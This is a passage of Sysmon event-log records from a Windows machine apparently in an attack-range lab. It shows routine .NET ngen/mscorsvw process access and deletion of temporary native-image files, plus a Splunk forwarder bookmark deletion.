CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)

Sysmon records from channel Microsoft-Windows-Sysmon/Operational on Computer win-dc-663.attackrange.local, one record per line, newest first (EventRecordID descending). The export ran the System-header fields together as EventID, Version, Level, Task, Opcode, Keywords, EventRecordID (for example "23542300x800000000000000023165" is EventID=23 Version=5 Level=4 Task=23 Opcode=0 Keywords=0x8000000000000000 EventRecordID=23165); values common to every record (Level=4, Opcode=0, Keywords=0x8000000000000000, Task equal to EventID, RuleName=-, Version=5 for Event 23 and Version=3 for Event 10) are not repeated below. Event 23 is FileDelete (deleted file archived by Sysmon); Event 10 is ProcessAccess. In Event 10 records the export also ran SourceProcessId and SourceThreadId together; they are split here in schema order (both are multiples of 4, e.g. 844 and 956).

EventRecordID=23165; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.668; ProcessGuid={4DB9351A-A279-60D3-8105-00000000CF01}; ProcessId=6492; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\X6S2NBQ6G0\Microsoft.Windows.Diagnosis.SDEngine.ni.dll.aux; Hashes=MD5=F1F8341A8B2A9FE635D29A016C84D091,SHA256=36297F3BE25FCA63383E3C347319B5667491DC0DE665DACC147D068A47EC3CB2,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23164; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.668; ProcessGuid={4DB9351A-A279-60D3-8105-00000000CF01}; ProcessId=6492; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\X6S2NBQ6G0\Microsoft.Windows.Diagnosis.SDEngine.ni.dll; Hashes=MD5=91401FE3119EB03D94519FB8611CA3A9,SHA256=AFC651ABA48764C28858807ABE57ADAAC9649FA82C0468857F43A11E35C14980,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23163; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.652; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-8105-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23162; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.636; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-8105-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23161; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.636; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-8105-00000000CF01}; TargetProcessId=6492; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23160; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.636; ProcessGuid={4DB9351A-A279-60D3-8005-00000000CF01}; ProcessId=6620; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\UTVN1S6V3R\Microsoft.Windows.Diagnosis.SDCommon.ni.dll.aux; Hashes=MD5=3F666AAC1B3038F1B6361C01514866ED,SHA256=EDE9020B906DC12426F9A1B71CAFF16A6544A2BA6A433F090D97A5AA2A09821B,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23159; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.636; ProcessGuid={4DB9351A-A279-60D3-8005-00000000CF01}; ProcessId=6620; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\UTVN1S6V3R\Microsoft.Windows.Diagnosis.SDCommon.ni.dll; Hashes=MD5=CC6684143F996F0BA66CB3B3240C8B29,SHA256=610360126AA509CE88B7C47DEFCD13DF70E61827867910333FE566D76BF22768,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23158; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.623; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-8005-00000000CF01}; TargetProcessId=6620; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23157; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.589; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-8005-00000000CF01}; TargetProcessId=6620; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23156; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.589; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-8005-00000000CF01}; TargetProcessId=6620; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23155; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.589; ProcessGuid={4DB9351A-A279-60D3-7F05-00000000CF01}; ProcessId=5136; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\69XCW4PRU6\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dll.aux; Hashes=MD5=0BF02B9E4B79A89F59CBE91B2D2E928B,SHA256=EB6D80CAA7B14C57895DDF276CA391A9C57E5669C640C5BF25FE6BFAF7DC457C,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23154; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.589; ProcessGuid={4DB9351A-A279-60D3-7F05-00000000CF01}; ProcessId=5136; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\69XCW4PRU6\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dll; Hashes=MD5=4F8AE868891EAD1A5902A6C9804ACFBC,SHA256=E1539B98884213E195AA711A50ADDE934D9F67867F42FA68CF3EA06701B68A03,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23153; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.558; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7F05-00000000CF01}; TargetProcessId=5136; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23152; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.543; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7F05-00000000CF01}; TargetProcessId=5136; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23151; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.543; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7F05-00000000CF01}; TargetProcessId=5136; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23150; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.543; ProcessGuid={4DB9351A-A279-60D3-7E05-00000000CF01}; ProcessId=7124; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\T9S92YUGX6\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dll.aux; Hashes=MD5=B6EE23DD0D59E1110C73C8181A683EB2,SHA256=F322704258EE53C446AE8E956575C984AACF22F05E88C0D9A4A6F1DF00569BC2,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23149; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.543; ProcessGuid={4DB9351A-A279-60D3-7E05-00000000CF01}; ProcessId=7124; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\T9S92YUGX6\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dll; Hashes=MD5=05C69DC37B2DF503E97DFC4C90FA1E39,SHA256=1B5E577C2D04335347BCF8104BD0935B0660624C9570CB6E388F5EEED08641BB,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23148; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.527; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=6A6A364410B202A4BB67C42875FDE0E5,SHA256=E2456F3AB4C0E71D1894B5EF45D97CF173BA1F6DFAD5C4AEC98952DEE18A030A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23147; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.511; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7E05-00000000CF01}; TargetProcessId=7124; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23146; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.480; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7E05-00000000CF01}; TargetProcessId=7124; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23145; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.480; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7E05-00000000CF01}; TargetProcessId=7124; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23144; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.480; ProcessGuid={4DB9351A-A279-60D3-7D05-00000000CF01}; ProcessId=1320; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\06YCPMZGA3\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.ni.dll.aux; Hashes=MD5=2D56EE767451F194D7F7E0448091B419,SHA256=BEA7659FF1C8DC6A2EF39855107FA1AD30F225120E8356E01349EA995F5F63D4,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23143; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.480; ProcessGuid={4DB9351A-A279-60D3-7D05-00000000CF01}; ProcessId=1320; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\06YCPMZGA3\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.ni.dll; Hashes=MD5=2F69DB0866DF2EF793094DE48C8E1BA5,SHA256=6475F1DFBC8009530D39E91412DF1326BB849AA04F4BA6509AAD2636FBF515AA,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23142; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.449; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7D05-00000000CF01}; TargetProcessId=1320; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23141; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.433; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7D05-00000000CF01}; TargetProcessId=1320; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23140; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.433; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7D05-00000000CF01}; TargetProcessId=1320; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; 